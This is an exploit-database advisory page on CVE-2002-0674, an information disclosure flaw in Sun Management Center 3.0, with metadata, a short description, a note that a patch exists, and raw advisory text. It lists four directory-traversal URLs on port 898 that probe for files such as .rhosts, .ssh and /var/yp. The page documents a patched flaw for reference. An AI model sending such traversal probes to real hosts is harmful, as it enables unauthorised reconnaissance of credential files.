header-logo
Suggest Exploit
vendor:
Sun Management Center
by:
SecurityFocus
4.3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Sun Management Center
Affected Version From: Sun Management Center 3.0
Affected Version To: Sun Management Center 3.0
Patch Exists: YES
Related CWE: CVE-2002-0674
CPE: o:sun:sun_management_center
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Information Disclosure in Sun Management Center

Sun Management Center is vulnerable to an information disclosure vulnerability due to improper handling of error messages. An attacker can exploit this vulnerability by sending crafted requests to the vulnerable server, which will return different error messages based on whether the requested resource exists or not. This can be used to gain sensitive information about the vulnerable host.

Mitigation:

Sun has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8873/info

A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts. 

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These examples were return different error messages based on whether the requested resource exists or not.

Navigation

Suggest Exploit

Services By CQR